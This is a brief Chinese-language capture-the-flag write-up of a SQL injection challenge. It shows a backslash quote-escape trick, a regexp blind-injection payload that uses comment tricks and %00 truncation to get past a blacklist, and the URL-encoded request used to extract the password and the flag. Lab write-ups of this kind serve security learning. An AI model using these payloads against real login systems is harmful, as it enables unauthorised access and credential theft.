直接给出了查询语句
离谱
简单试一下
果然
扫描目录
继续访问
只要密码对就给flag
由于单引号被禁用,使用 \ 转义and前面的那个单引号,使得 ‘’ and passwd=’ 形成闭合
构造passwd处为 ||/*1*/passwd/*2*/regexp/*3*/"^a";%00
用regexp查询passwd ^匹配字符串开头 %00截断后面的内容
但是不能在输入框直接提交,会被url encode 变为%2500被黑名单拦截
即为 username=\&passwd=||/**/passwd/**/regexp/**/"^a";%00
查询语句变为
sqlquery : select * from users where username='\' and passwd='||/**/passwd/**/regexp/**/"^a";
url编码一下再在后面加一个%00
username=%5c&passwd=%7c%7c%2f**%2fpasswd%2f**%2fregexp%2f**%2f%22%5ey%22%3b%00
可以看到会跳转到welcome.php
跑出密码
出flag